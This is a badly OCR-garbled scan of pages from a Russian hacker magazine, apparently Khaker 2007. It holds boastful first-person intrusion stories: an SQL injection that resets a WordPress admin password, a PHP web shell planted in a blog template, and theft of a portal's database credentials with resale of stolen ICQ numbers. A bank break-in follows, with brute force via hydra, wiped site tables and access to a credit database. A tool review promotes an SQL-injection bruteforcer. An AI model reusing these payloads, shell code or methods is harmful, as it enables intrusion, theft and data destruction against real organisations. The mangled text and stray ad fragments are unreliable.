коггезропбепкпеіУѵѵр-абтіп/изег-ебіКрІір и сохранил страничку себе 
на винт. Далее, открыв ее в блокноте, я нашел следующий участок 
Ыті-кода: 
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> ѵѵагпіпд 

Все описанное в 
статье является 
плодом больного во- 
ображения автора. 
Любые совпадения 
с существующими 
сайтами случайны. 
За использование 
материалов статьи 
в противозаконных 
целях ни редакция, 
ни автор ответствен- 
ности не несут. 







> ІП^О 

Спасибо СавЬ’у за 
помощь в разработ- 
ке бага! 





Регистрация и аттач номеров на Бигмире 




И-' щесііоп в ЬЛр:/Логит.когге5ропбеп1.пе1 






*-■ ' ’ ■ т ■ -■ »■,= і мііІГи ч . • 



- П ■■ П+ Н-ШПЧ Ій» 

' ■ гл«і іі ■. н 

■ Ьіцр гіР* І-+Г щМЛ 

- инь -і в-к; чьи » 

■ Ь-Ьіті Ь»» Г1 

■ Р ь ! ■ И І- Я, і 4 і 

- Г ■ I і№ЫМ 



. . -чнпчі т 

. Г, - — і . Р^-.І 

и. ь ^н.. 



I _И ■ П "ММ I ітН- І Р 

1 ІШ г |ПІ і ■ - и ри 



і яшлл >■ і.І ИНН і 



■І«р МП 



ч ,“_ 

НИ 1 

■ ніін і_ Ч НИС 



Клиентский АРІ партнеров ісд.сот 



<Рогт паше= " есІіСизег " ісІ= " есіікизег " 
асСіоп= "изег-есіік . рЬр " теЫтосі= "розк " > 

<СаЫе ѵісІ±.Ъ= " 99% " Ъогс1ег= " 0 " 
се11зрасіпд= " 2 " се11рас!с1іпд= " 3 " > 

Заменил его: 

сЕогт паше= "есІіСизег " іс!= " есіікизег " 
асСіоп= "ЛССр : / /Ыод . коггезропсіепС .пеС/ѵѵр- 
асІтіп/изег-есііС . ркр" теСІюс1= "розк " > 

<СаЫе ѵ7ІсіЫі=" 99% " Ъогс1ег= " 0 " 
се11зрасіпд= " 2 " се11рас!с1іпд= " 3 " > 

Затем нашел ЫсИеп-поле с ивег_іб и заменил его: 

<СехСагеа паше= "изег_і«і" гсжз="5" ій="пеѵ7_ 
сіезсгіркіоп" зЦу1е =,, \ѵіс1С]т: 99%; "></ 
Сехкагеа> 

После всех перечисленныхдействий я сохранил заряженную 
страницу и открыл ее в браузере. 

Теперь необходимо сделать небольшое пояснение, каса- 
ющееся найденной уязвимости: из ЗОБ-запроса видно, 
что при ирбаіе пользовательского профиля вообще не 
проверяется параметр $изег_ісІ, то есть таким образом мы 
можем обновить профиль любого юзера, но прежде всего 
нам необходим админ. Как просто и быстро поставить админу 
свой пароль? А вот как. 

В нашей ядовитой страничке вписываем в поля слогином 
и паролем любые логин и пароль, например ІезІегДезІег, 
а в бывшее ЫсИеп-поле вбиваем: «-99 оги5ег_1еѵе1=10/*» 
(естественно, без кавычек). В итоге, наш скул-запрос получа- 
ется следующим: 

ІІРБАТЕ ѵтр_изегз ЗЕТ изег_1одіп = ’СезСег' , 
изег_ТігзСпате = 1 ' ,изег_разз=МБ5 ( 'СезСег' ) , 
изег_1азСпате= * 1 , изег_піскпате= ' ' , 
изег_ісд= ' 1 , изег_етаі1=' 1 , изег_иг1= 1 1 , 



изег_аіт= ' ' , изег_тзп= ' ' , изег_уіш= ' ' , 
изег_іскпос1е= ' ' , изег_сіезсгіркіоп = ' ' , изег_ 
пісепаше = ' ' ѴШЕЕЕ ІБ =-99 ог изег_1еѵе1=10/* 

Так как юзера с Ю=-99 в базе данных однозначно не сущес- 
твует, обновятся данные лишь юзера с изег_ІеѵеІ=1 0, то есть 
админа :], 

Ленивые админы 

Став админом Ыоо.коггевропбепТпеІ: . я задумался над 
получением шелла на сервере. Скажу по секрету: у меня есть 
еще один обнаруженный мной приватный баг, позволяющий 
легко и безболезненно получать шелл из админок ѴѴогбРгевв 
версий 1. 5-2.1. Нотебе хватит и предыдущего привата :]. 

Эта уязвимость все равно мне не понадобилась, поскольку, 
зайдя в «Редактор шаблонов», я увидел, что все рЬр-файлы в 
{етріаіе-директории открыты на запись. Теперь необходимо 
былотайно встроитьсвой шелл в один изуязвимых файлов. 

Я быстро набросал следующий рЬр-код: 

<? 

іззеС ( $_СЕТ [ Тисккк] ) ? ргіпк 1 $_СЕТ [ Тисккк] 1 
?> 

И вписал его віетріаіе шапки блога. Таким образом, по 
адресу ШрУ/Ыод.коггевропсІепТпеІ можно было ви- 
деть обычный блог, а на ЫТр^/Ыод.коггевропсІепкпеІ:/ 
?1шсккк=[команда] — красивый и удобный шелл :]. 

А дальше я начал изучение сервера Ьідтіг.пеІ . В первую 
очередь меня интересовала база данных Бигмира. Отпра- 
вившись на поиске параметров подключения кбазе, я нашел 
файл /з1огаде/ѵѵеЬ/Ыбос5/Ьідтіг/Ьідтіг2/сопРд.рЬр, в 
котором находились следующие строки: 

// ргосіискіоп 

сіеіііпе ( 1 ВМ_БВ_НОЗТ 1 , 1 сЬсі2 . зш 1 ) ; 
сіеіііпе ( 1 ВМ_БВ_ІІ ЗЕВ 1 , 1 Ьідшіг 1 ) ; 
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сіебіпе ( ' ВМ_БВ_РА83 ' , ' ЫасБадедШкесВі 1 ) ; 

Далее я закачал на сервер скрипт управления БД от РивН Зесигііу 
Теагш [ НирѴ/тепіаКзіЬіпІегсот.ги/Мето/сІиітір/гзІ: вдІ.М . на офици- 
альном сайте скрипт недоступен) и поставил его по адресу ЫірѴЛіІез. 
коггезропсІепІ.пеі/ітдЛогаЦ/а/4/ІіеасІег.рІір . Залогинившись с 
полученными данными, я минуту наблюдал долгожданную картину 
— всетаблицы Бигмира были передо мной :]. Немного походив по 
ним, я нашел таблицу с юзерами в Ьт_дІоЬа1.іі5ег. Полтора миллиона 
регистраций, все пароли к аськам в открытом виде! Ну не чудо л и? 

Ты можешь наблюдать частьтаблицы с пятизначными номерками на 
скриншоте :). 

Что дальше? 

Продав все пяти-, шести- и семизначные номера из базы Бигмира с помо- 
щью друзей, я задумался, а что же делатьдалыше? Перспективы откры- 
вались огромные: во-первых, в моих руках был клиентский АРІ партнеров 
ісд.сот [наблюдать еготы также можешь на скриншоте); во-вторых, мой 
шелл на протяжении двух недель никто не палил; а в-третьих, я нашел 
таблицу с админами Бигмира иу меня был доступ к ЫірУ/асІтіп.Ыдтіг. 
дФ (сейчас доступ кадминке возможен лишь с определенных ІР-адресов). 
Решив пойти по пути наименьшего сопротивления, я стал изучать регу 
номеров. В результате в файле /з1;огаде/ѵѵе Ь/Ы;сІос5/Ьідтіг/іпсІисІе/ісд_ 
ір5_сІа55.рЬр я увидел следующую функцию: 

РипсСіоп гедізСег ( $раззілгогс1 / $етаі1, $піскЫаше, 
$бігзкЫате = баізе, $1азкЫаше = баізе, $ЬігСІіВау = 
баізе, $зех = Раізе, $соипкгу = баізе, $сіку = баізе, 
$зСаке = баізе) 

{ 

} 

И стал ваять автореггер ІСО-уинов. Создал рбр-гейтна Бигмире, где в 
цикле запустил указанную выше функцию, затем на том же рбр написал 
клиент к этому гейту и с помощью программы рбр2ехе, которую ты можешь 
часто видеть на дисках, прилагаемых кжурналу, перевел его в экзешник. 
Процитирую одного из первых покупателей этой программы (каіеовіга): 



«Купил — доволен; итак, тесты: 10 мин, 4 100 номеров с семи копий, 410 
в минуту с семи копий, 59 номеров в минуту с копии! Ресурсы нежрет 
вообще». 

Как видишь, результаты ошеломляющие :). Но этого было, как 
обычно, мало. За несколько часов товарищ СавЬ написал 6 III -ин- 
терфейс на Оеірбі с поддержкой потоков, и получилась довольно 
симпатичная прога, которую ты можешь наблюдать на скриншоте. 

За однуночь4человека за ре га л и более полумиллиона уинов, в 
результате Бигмир повис надолго. Затем была отключена регистра- 
ция номеров, и на сервере украинского портала стали проводиться 
какие-то технические работы. Через де ньвсемои бэкдор- шеллы 
удалили, был установлен ѴѴогбРгевв последней версии и изменены 
пароли всех админов Бигмира. Но меня это ничуть не расстроило :). 
Покопавшись в слитом движке Бигмира, я нашел скул -инъекцию, 
с помощью которой снова получил доступ к базе данных :). Правда, 
через несколько часов его перекрыли. 

В итоге, было продано очень много элитнейшихуинов, зарегистрировано 
очень много девяток для спама (у меня самогодо сих пор лежит около 
250к, если будут нужны — обращайся), и, что самое главное, был подорван 
авторитет не только локализованного партнера ісд.сот ШрУ/Ьідтіг.пеІ . 
но и всего АОБа. 

На этом следует остановиться. Как видишь, даже очень крупные проекты 
не могутустоять перед хакерами. Стоит задуматься, какой из локализо- 
ванных партнеров будет следующей жертвой безжалостного I СО хакерс- 
кого андеграунда? :1 ~шг 




АОІ_ поступил очень грамотно, ограничив функции локальных привязок 
номеров. Буквально весной еще можно было, владея мылом, к которому 
привязан номер, и не имея пароля кэтому номеру, сменить пароль на 
мыле и получить этот номер в свое владение. Сейчас эта возможность 
действует л ишь при известном тебе пароле на привязанном уине :(. 
Атеперь подумай, если бы Бигмир был взломан мной или еще кем-нибудь 
вто самое время? В подобном случае абсолютно все элитнейшие номера 
скопились бы в одних руках... 
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Бесплатный крепит 

Двухсерийный взлом банка 

Как-то раз я ходил погашать кредит. Ожидая на кассе своей очереди, я вдруг подумал: 
«Сколько можно отрывать от сердца больше половины зарплаты и тратить нервы? Чем эти 
жадные уроды лучше других? Вот был бы способ погасить кредит досрочно ина халяву. . . А 
почему бы и нет?» С этой мыслью я уступил место в очереди какой-то бабульке и со спокой- 
ной совестью пошел домой... ломать банк, чтобы погасить кредит без очереди. 



И делал я благое дело среди царящего здесь зла 

Из всего набора необходимых данныху меня был только адрес сайта 
этого банка — ѵѵѵѵѵѵ.аЬпк.кг . Ни белых адресов банковских сетей, ни 
схемы инфраструктуры... Я даже не знал, где находится главный офис 
и хостится сайт. Хотя... тут я вспомнил, что, когда заключал договор с 
банком, у них как раз на моей очереди случились какие-то проблемы с 
сетью. Естественно, мне это было небезынтересно хотя бы потому, что 
большую часть своей профессиональной жизни я отработал сисад- 
мином. После нескольких социнженерных уловок добрые тетеньки 
менеджеры выложили мне практически полную топологию своей сети. 
Оказалось, что главный офису них находится в столице, а несколь- 
ко дочерних в нашем городе просто подсоединены к провайдеру по 
Ю5І_-ка налам. Это означало, что если узнать белые ІР-адреса главного 
офиса, то от взлома их сможетспасти только техника. 

Недолго думая, я проверил сайт на сІотаіпзсІЬ.пеі и сильно расстроил- 
ся :(. Вместе с банком на сервере хостилось еще несколько контор, а 
это могло означатьтолько одно: хостинг платный и не имеет никакого 
отношения к серверам банка. Как ни печально, но единственная за- 
цепка оказалась пустышкой. Что ж, вариантов было немного, а потому, 
хорошенько затарившись на сэкономленные деньги зажигательной 



жидкостью в виде окрыляющего РебВиІГа, я подключил 6РР5, зарядил 
свежий анонимный прокси и отправился на сайт в поисках хотя бы 
чего-нибудь полезного. 

А ларчик просто открывался 

Немного посерфив сді-странички, внимательно изучив исходники, я 
понял, что меня ждет долгий и интересный взлом с целью погашения 
кредита. 

Обычные 5СИ-инъекции, Х55- или подобного рода уязвимости можно 
было и не пытаться искать. Движок сайта был написан вручную с 
нуля, причем, скорее всего, какой-то конторой под заказ. Уж больно 
грамотно все было сделано, хотя это и не исключало ошибок. Втыкать в 
случайном порядке одинарные кавычки в адресную строку мне быстро 
надоело. Решив нетратить время на «детские шалости», я натравил на 
сайт свой любимый Хврісіе г. Через полчаса сканирование завершилось 
удачей для меня! 

Можно было и самому догадаться почитать гобоів.М в корне сайта, но 
раз уж это сделала программа, то... 

Короче, среди десятка строке каталогами, которые не обходятся поис- 
ковой машиной, лежали три самых интересных. 



► 078 



ХАКЕР 08 /104/ 07 



взлом 



» 




/сді-Ьіп/асІтіпЦооІ/ 

/рЬршуасітіп/ 

/агсЬ./ 

Чуешь чем пахнет? Правильно, админкой сайта, админкой базы данных 
и каталогом бэкапов :). 

Да здравствует солнце, да скроется тьма! 

Первым делом я пошел в админку и тутже сполз под стол. На странице 
висело приглашение, а также следующие поля ввода: 

Фамилия 

Имя 

Логин 

Мыло 

Контрольное_Слово1 

Контрольное_Слово2 

Пароль 

Интересно, к чемутакая защита? Втакие моменты сразу вспоминается 
народная мудрость, которая звучит примерно так: «Заборы и замки — от 
честных людей». Или так: «Если кто-то очень захочет что-то сломать, 
то его не остановят даже 20 паролей». В общем-то, я и не надеялся, что 
удастся сразу зайти в админку, так что почти не расстроился... Открыв 
исходники страницы, я, хотя мне это и несвойственно, улыбнулся, 
поскольку в комментариях разработчик оставил такое послание: «В 
принципе, здесь нет ничего интересного... Но помни! Чрезмерное 
любопытство ведет к плагиату!» Юморист, блин. 

Тем не менее не останавливаясь на достигнутом, я пошел по ссылке 
ѵѵѵѵѵѵ.аЬпк.кг/а гсИ . Как и следовало из имени, каталог действительно 
оказался файловой помойкой. Куча ЫтГок, 2 Ір- и 1аг.Ь22-архивов. Вот 
это уже интереснее :). Широкая русская душа заставила меня найти 
наиболеетяжелый файл и скачать его. Этот файл имел самое непри- 
метное название — зоигсе.іаг.Ь22 и весил 250 метров. Удача на этот раз 
была явно на моей стороне! Естественно, качатьтакой объем по ѲРР5 
я не собирался. Открыв асю и полистав контакты, я нашел ближайшего 
знакомого с выделен кой, попросил скачать архив и пошел спать со 
спокойной совестью. Наутро заболваненный файл был уже у меня. 

Архив был свежий. 

# Ьші2Ір2 зошгсе. Ъаг . Ьг2 

# Даг -хб зоигсе.Ъаг 

Посредством этих двух строчек я получил точную копию сайта интересу- 
ющего меня банка. Самое время погрузиться в дебри СОІ. 



Все, что меня тогда интересовало, — это админка, а точнее, два кодовых 
слова, которые надо было ввести помимо личных данных пользователя. 
Искать пришлось недолго. В исходнике зеленым по черному стояла 
проверка этих полей с двумя конкретными Мйб-хешами. Вотони: 

1. Ь972 6е0992371е1а<і37Ьб1е47<і2 80сб1 
2 . (341с38с(39 8б00Ь2 04е9 80 099 8есб8427е 

Незнаю, может, кто-то и подберетих, но у меня терпения хватило ровно 
на два дня. Не дождавшись своих паролей, я отрубил брутфорс и пере- 
шел по следующей, третьей ссылке: ѵѵѵѵѵѵ.аЬп к. кг/р Ьр гл ѵасіппіп . 

То, что я увидел здесь, ввело меняв ступор! Несколько минут я сидел 
как вкопанный... Нет, я, конечно, понимал, что встречу здесь админку 
базы данных, но то, что она будете правами админа, я никак не думал! 

Ну админ... Надо быть либо гением, либо полным идиотом, чтобы 
оста вить та кую дыру. Наверное, ему было приятно заходить на сайт и, 
не заморачиваясь с паролем, сразу редактировать базу. Хотя, кто знает, 
обычнотакой софт предоставляет сам хостер, так что, скорее всего, это 
его вина. Жаль, что идея полазить по другим сайтам хостера и немного 
«подправить» их не пришла мне в голову сразу. 

Сейчас моей задачей был не банальный дефейс. Мне даже неинтерес- 
но было заглядывать в таблицу изегв. Я нашел кое-что поинтереснее :). 
Среди гортаблиц в базе лежало около десятка с названием «что-то_ 
там_ѵѵа1:сЬег». Это были счетчик посетителей, логгер а йпишнико в и т.п. 
В первыхже строках я нашел и адрес своего прокси :). Значит, эта штука 
реально работала. Только кактеперь оттуда вытащить нужные банковс- 
кие адреса? Я решил посчитать. 

Отделяем мух от котлет 

ЮЭЕ-линии в нашем городе тянет только одна контора. В столице есть 
еще несколько, но, как правило, крупные организации заключают дого- 
воры о предоставлении каких-либо услуг с одной организацией для всех 
филиалов. И интернет здесь не исключение. Какой смысл заключать до- 
говоры с разными провайдерами и платить каждому в отдельности, если 
«Казахтелеком» работает на всю страну? Но это были лишь логические 
доводы. И как потом оказалось, я двигался в правильном направлении. 

Я вспомнил о соседе, у которого был протянут ЮЗЕ. Выцепив его в ась- 
ке, я попросил его зайти на ѵѵѵѵѵѵ.тѵір.ги . Он тутже скинул мне резуль- 
тат: 85.1 02.53.78 (повторюсь: реальные адреса я по понятным причинам 
не указываю; все совпадения случайны). Логично было предположить, 
что все, что начинается с 85, — это пул одного и того же провайдера. В 
результате экспортирования и простой фильтрации саі ірѵѵаіебег | дгер 
85 я получил нехилый списочек диапазонов ІР-адресов. 

Перед тем как начать копать, я нашел втаблице изегз пользователя 
с неприметным именем абтіп и настрочил емуувесистое письмецо с 
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> ѵѵагпіпд 

Уясни себе хоро- 
шенько, что все 
действия, опи- 
санные в статье 
и относящиеся, 
естественно, к об- 
ласти фантастики, 
подпадают под 
272-ю статью УК 
РФ. Не вздумай 
совершать нечто 
подобное, иначе 
можешь поплатиться 
свободой. 




/«ѵ 



> ІП^О 

Кстати говоря, баг 
закрыли только 
через две недели, 
пароли к серверу 
поменяли тогда же :). 




В каталоге сайтов несложно найти несколько хостеров 

описанием уязвимостей на сайте и способами ихустра- 
нения. А в качестве бонуса я прикрепил к письму хеши 
паролей админки и его личный ;). 

Передо мной стояла сложная задача — разгрести около 
5 000 строк в поисках одного диапазона ІР-адресов. Как 
можно было упростить эту задачу? Я вышел на каталог ка- 
захстанских сайтов [ ѵѵѵѵѵѵ.зііе.кг ) и открыл страничку с хос- 
те рам и. Мне повезло, и, кроме ссылок, там лежали физи- 
ческие адреса и телефоны организаций. Выбрав несколько 
хостеров из столицы, я начал пинговать всех по очереди. 
Каково же было мое удивление, когда я обнаружил, что 
айпишники больше половины из них начинаются с 85.1 04. 
Конечно, все они использовали 1 051-линии. Еще одна 
фильтрация — и список уменьшился сразу в несколько раз. 
Рассортировав список в порядке убывания и пробежав его 
взглядом, я отсеял адреса, которые встречались 1 -2 раза, 
после чего удалил повторяющиеся строки из оставшихся. 

В результате этих нехитрых манипуляций база айпишников 
стала содержать в себе чуть более 40 строк. 

Следующим шагом собранные «сливки» попали под обра- 
ботку командой Ьозі, которая, как известно, возвращает 
имя хоста по заданному ІР-адресу. Результаты немоглине 
радовать — похоже, я нашел то, что искал! 

# козк 88.104.193.193 

88.104. 193 . 193 . іп-асЫг . агра сіотаіп паше 
роіпРег дмі . аЬпк . кг . 

# козк 88.104.192.181 
88.104.192.181. іп-асісіг . агра сіотаіп пате 

роіпкег таіі . дмі . аЬпк . кг 

От предвкушения дальнейших действий захватывало дух. 

Время — деньги! 

Почтовый я щи к трещал по швам от спама, но ответа от 
админа не было, хотя прошло уже два дня. Копии моего 
послания админу полетели еще на два ящика: зиррогШ 
аЬпк.кг и іпіойабпк.кг. В конце писем я какбы невзначай 
добавлял, что, в случае если от них не последует реакции в 
течение суток, их сайтбудетзверски взломан ;]. 

Я неспешил атаковать центральный сервер — на этот счет 
у меня была немного другая идея. Если в течение суток они 
не ответят или не за кроют дыры, сами виноваты. Их сайт 
подвергнется дефейсу, а пока они там всем банком будут его 
восстанавливать и искать виновника, у меня будетболыше 
шансов проникнуть на сервер незамеченным. Ведь админы 
— тоже люди :). Вся фишка в том, что они должны прекрасно 
понимать отсутствие связи сайта с сервером, а значит, все 
внимание будет приковано к сайту, а не к головному 




Главная страница пока еще непострадавшего банка 

серверу. Никто и не подумает, что сайт был взломан только 
для того, чтобы проникнуть на сервер. Что ж, теперь остает- 
ся только ждать. 

Молчание — знаксогласия 

Как ты уже понял, мои письма они проигнорировали. Что 
и требовалось доказать! Именно это мне и было нужно. 

Не хотятзакрывать дыры — заставим, неумеют— научим. 
Перед тем какдефейситьсайт, я натравил птар на дѵѵі .аЬпк.кг . 
Из имени хоста можно было сделать вывод, что это шлюз 
центрального офиса (дѵѵ — даіеѵѵау, цифра 1 — головной). 
Результаты сканирования не заставили себя ждать: 

21/кср ореп ікр 

22/кср ореп ззЬ 

53/кср ореп сіотаіп 

139/Оср ііікегесі пекЬіоз-ззп 
443 /кср ореп іЩДрз 

1720/кср ііікегесі Н. 323/0. 931 
1723 /кср ореп рркр 

33 06/кср ореп тузді 

Воттакое интересное кино получается. На сервере стоят 
никсы, открыт РТР для служебного пользования, работает 
БЫЗ. Также, возможно, стоит ЮАР, если ужони внутри сети 
используют никсовый БЫЗ. Нирз, скорее всего, использу- 
ется для безопасного обмена данными с другими офисами. 
Му50І_ есть, но, вероятно, не для базы клиентов банка. 

Если стоит Ыірз и идет обмен данными с другими офисами, 
то какой смысл тутже держать открытой базу? Наверняка, 
там висит какой-то сервис, который обрабатывает Р05Т- 
запросы, а сам уже работаете базой данных, расположен- 
ной на специально отведенном сервере. 

Вломиться на РТР не получилось. Анонимного юзера посы- 
лали на Роз* Соппесбоп. Долбиться на 55Н было бесполез- 
но. На большинстве крупных серверов суперпользователь 
фильтруется, и зайти можнотолько под обычным с последу- 
ющим повышением прав. А логины обычных пользователей 
взять, конечно, было неоткуда. Оставался лишь ррір. 

За неимением логинов я решил долбиться под рутом. Сгоняв 
на ѵѵѵѵѵѵ.Оіс.огд . я обновил свой старенький ррір-брутер до 
версии 0.1.4. Потом достал из заначки 200-метровый слова- 
рик, подготовил командную строку кбою и еще раз проверил 
мыло. Письма по-прежнему не было. В консоли висела 
строка «саі * I ./сі І5І;г/рр1;р/рр1;р_Ьги1;ег 88. 1 04.1 93.1 93». 

Настало время действовать 

Обновив прокси, я зашел в админку базы данных. Бэкап де- 
лать я даже и не думал. Настало время играть по-взрослому. 
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Упрощенные системные требования: 

ІпІеР Регііит или АМО х АіЫоп*. 266 МНг. 32 РАМ 
, Ѵ/іпсІоота 4 ' Ме, 2000 или ХР 
МасготаЛа Пазл Ріауег 



Обновленная уникальная ѵпашнка 
Новые уровни и монстры 
Невой система іеймппеи 
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Чем больше у них будет головной боли, тем большея выиграю времени. 
Конечно, ты можешь сказать, что это противоречит принципам хакера, 
но когда речь идет о серьезных намерениях, а не о простом дефейсе, 
тут уже не до благородства. Если учесть, что было посланотри письма, 
которые остались без ответа, моя совесть чиста :]. 

Легким движением руки таблицы одна за другой обнулились. После это- 
го на главную страницу стало невозможно смотреть без слез. Остались 
только картинки, да и те были как-то криво раскиданы ;]. Ноторопиться 
было нельзя, нужно было дать им время, чтобы они успели сообразить, 
что к чему. Через полчаса указательный палец опустился на <Епіег>. 
Посмотрев несколько минут на процесс перебора, я пошел спать. 

Гидрой по базе 

Проснувшись примерно через 4 часа, я первым делом подошел к 
компу. Брутфорс поработал на славу. Пароль был подобран. Банально: 
Ѳіасііаіог. Банку явно не повезло — а нечего процент на кредит заоблач- 
ный ставить :)! 

ІР-адрес моего соединения был 1 92.1 68.7.41 . Недолго думая, я поп и н- 
говал 7.1 , 7.254, а также диапазон от 7.1 до 7.50. Несколько адресов 
были живыми, и почти все они оказались виндовыми маши на ми. Как 
показал п тар, 7.1 был шлюзом, а 7.10 — сервером с базой данных 
М550І_. Вот результаты птар. 



РОКТ 


8 ТАТЕ 


ЗЕКѴІСЕ 


42 /кер 


ореп 


патезегѵег 


53 /кер 


ореп 


сіотаіп 


88/кср 


ореп 


кегЪегоз-зес 


100/кср 


ореп 


пемасск 


135/кср 


ореп 


тзгрс 


139/кср 


ореп 


пекЫоз-ззп 


389 /кер 


ореп 


Ісіар 


445 /кер 


ореп 


тісгозокк-сіз 


464 /кер 


ореп 


краззѵ\гс15 


593 /кер 


ореп 


кккр-грс-ертар 


636/кср 


ореп 


Ісіарззі 


1026/кср ореп 


ЬЗА-ог-пкегт 


1027/кср ореп 


ИЗ 


1433/кср ореп 


тз-зді-з 


3268/кср ореп 


дІоЪаІсакЬБАР 


3269/кср ореп 


дІоЬаІсакЬБАРззІ 


3389/кср ореп 


шз-кегш-зегѵ 



Воттакие ужасы творятся на виндовых серваках. Надо полагать, что если 
на сервере настроен М550Ц значит, это кому-то нужно :). Я полагал, что то, 



что хранится в этой базе, нужно как раз мне :). Через пару минутіЬс-ЬусІга 
была скомпилирована и готова к работе. Эта замечательная программка 
служит для подбора паролей по словарю по многим протоколам. Протокол 
М550І_ также присутствует, причем компилируется поумолчанию. Для 
него не нужны дополнительные библиотеки, какдля 55Н (ІіЬззГі). 

Для того чтобы запустить Гидру, нужно знать логин и иметь хороший 
словарике паролями. Как известно, на МББОБ-сервере существует 
пользователь 5А (Бувіет Абтіпізігаіог), поумолчанию обладающий 
правами админа. Вот для него-то я и подбирал пароль. Сразу скажу, что 
пароль Ѳіадіаіог не подошел :). 

# Ъусіга -1 за -Р а11ѵ\гогс!з2 . сііс -к 50 192.168.7.1 тззді 

Словарь для перебора я взял на диске одного из прошлых выпусков 
журнала. Через пару часов работы Нубга выдала сообщение: 

[1433] [тззді] кюзк: 192.168.7.1 Іодіп: за раззѵгогсі: 
текаіі 

[ЗТАТІІЗ] аккаск кіпізкесі ког 192.168.7.1 (маікіпд бог 
скіісіз ко кіпізк) 

Ура! Пароль был подобран. Админам явно не хватало фантазии на более 
серьезные комбинации :). Пока пароль подбирался, я успел скомпилить 
ѴМѴѴаге Бегѵег и установить на него винду, после чего воткнул туда 
Епіегргіве Мападег из стандартной поставки М55СИ5егѵег. 

Сильно тормозя, Епіегр гізе Мападег под кон не ктился к базе. Быстро 
пролистав ее, я понял, что нашел то, что искал. Кроме стандартных 
Мавіег, М із1, на сервере крутилось еще несколько баз данных, и одна 
из них называлась Сгебкв. Сделав выборку из базы, я нашел всю под- 
ноготную своего кредита и кредитов нескольких своих друзей, которые 
тоже имели дело с этим банком. 

И был взлом! 

В этот момент я задумался: а стоит ли идти дальше? Банк можно считать 
взломанным, кредит погашенным, но если я удалю себя из базы, где 
гарантия, что работники банка не поднимут бумажные документы? Ведь 
кредитный договор-то оставался в силе! 

Я опять вошел на сайт... Он по-прежнему был задефейсен, и никто, 
по-моему, не спешил его поднимать. Немного поразмыслив, я закрыл 
ррір-соединение. Через несколько минут было готово письмо адми- 
нам. В нем я описал всю процедуру взлома и предсказал возможные 
последствия. Я предложил им ставить пароли не менее 1 6 символов, 
состоящие из букв разного регистра, цифр и спецсимволов. К примеру, 
Рд#.]{76Нік ; !іВ5.зс 
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Х-ІООІ5 

Программы для хакеров 




ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ ПОШ@ВК.КІІ / 



Л ПРОГРАММА: 50І_ВКІЯЕК Ѵ.0.2 

ОС:*ІЧІХ/УІІЧ 

АВТОР: КАЕОК 




ІОблегчаем себе жизнь — юза ем БСИВгиІег :)| 



Технологии проведения, обнаружения и 
анализа 50І_-инъекций не раз подробно 
описывались в нашем журнале (в том числе и 
в моих статьях, почитай подшивку «Хакера»]. 

Но актуальности подобного рода уязвимости 
нетеряют. Поэтому вернемся квопросуо набо- 
левшем, а именно о методах подбора названий 
таблиц/полей из БД. Какты понимаешь, сидеть 
часы/сутки/недели напролетза монитором, 
обложившись различными словарями, и под- 
бирать злополучное названиетаблички — пер- 
спектива малоприятная (учитывая летний 
период и полураздетых девушек на улицах :)). 
Поэтому здравомыслящие хакеры предпочи- 
тают всячески автоматизировать этот процесс, 
избавляя себя отлишних мучений. Ксожале- 
нию, хорошего и полнофункционального софта 
для ЗОБ-брута довольно мало. Помнится, в 
одном из прошлых выпусков Х-Тооіз я выкла- 
дывал приватную утилу от Античата, которая ко 
всему прочему имела 6111-интерфейс. Многим 
софтинка пришлась по душе, тем не менее 
спешу представитьтебе ее прямого конкурента 
— ЗОБВгиІег ѵ. 0.2.СкриптнаписаннаРНРи 
обладает рядом полезных возможностей. Пре- 
жде всего, тулза предназначена для определе- 
ния количества выбираемых полей, названий 
таблиц и столбцов. При запуске необходимо 
указать несколько обязательных параметров: 
Ьобі — атакуемый сервер (например, ІагдеБ 
сот): раіЬ — путь к скрипту с уязвимым пара- 
метром (например, /изег. рЬр?ісІ=2); т обе — тип 
брутфорса. 



Если с первыми двумя параметрами все 
понятно, то натретий стоит обратить особое 
внимание. В версии брутера 0.2 доступно 
4типа брутфорс-атак: 

1 — б рут количества выбираемых полей; 

2 — б рут названий таблиц; 

3 — брут названий столбцов; 

4— посимвольный брут. 

Кстати, для каждого из режимов в качестве 
дополнительного параметра нужно указывать 
значение зігіпд — строки, которую вернул 
сервер в ответ на неверный запрос. К примеру, 
если ты перебираешь количество полей, то 
в роли зігіпд'а будет, скорее всего, строка 
«ТЬе изеб 5ЕБЕСТ Біаіетепіз Ьаѵе а сШегепІ 
пи т бег о! соіи тпБ». Аналогично и с осталь- 
ными режимами, только не забывай изменять 
значение этого параметра, иначе брут не 
принесетжелаемого результата =). 

Кроме всего прочего, отмечу пару важных 
опций скрипта, без которых нетсмысла его 
использовать: ведениелога и использование 
прокси. 

Для первого следует указать «-о=[Е1е]» р где 
выставляется имя и размещение файла с ло- 
гом, а для второго — «- р=[і р : рогі;] », где нужно 
вбить адрес проксика и порт. В общем, прин- 
цип работы и основные возможности тулзы я 
описал, а юзать ЗОБВгиіег или нет — решать 
тебе. Нопомни.покатыпьешьпиво, ЗСІБВгиІег 
работает, так что делай правильный выбор и 
смело забирай скрипт с нашего диска =). 

^ ПРОГРАММА: ХР АЫТІ-ЗРѴ 

0С:У№0У5ХР 

АВТОР: СНКІ5ТІАІЧ ТАИВЕМНЕІМ 

Как ни крути, но без Винды сейчас не обой- 
тись, и это нужно хорошо понимать (хотя, 
поверь, Ли нуху я люблю не меньше тебя =)). 

А потому приходится снова и снова приспо- 
сабливаться под все время возникающие 
глюки/«сюрпризы» этой опера ционки. 

Честно говоря, я получаю мало удовольствия, 
постоянно наблюдая стандартные сообщения 
об ошибках (с риторическим вопросом об 
отправлении отчета мелкомягким) и пресекая 
безудержные попытки Мебіа Ріауег’а обно- 
виться =). Конечно, все это можно отрубить, 
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Изгаляемся над Виндой 



покопавшись в настройках или реестре. Но 
есть и более простое решение — утила ХР 
АпІІ-5ру. Софтина предназначена как раз для 
регулирования некоторых весьма «неудобных» 
параметров Винды (всевозможных сообщений, 
предупреждений, обновлений и прочей дряни, 
мешающей нормально работать :]]. Меню проги 
представлено в виде списка с заголовками 
основных разделов: 

1. Параметры встроенного проигрывателя М5 

МебіаРІауег 

2. Отчеты об ошибках и сбоях, происходящих в 

системе 

3. Разнообразные дополнительные параметры 

4. Параметры встроенного браузера I піегпеі 

Ехріогегб 

5. Фоновые службы и программы 

6. Параметры запуска и деинсталляции М5 

Меззепдег 

Т.Управление Ред5ѵг32.ехе 

Первый пункт содержитв себетакие функции, 
какотключение автоматической загрузки 
медиаплеером кодеков через инет, отключение 
отправки отчета мелкомягким об использова- 
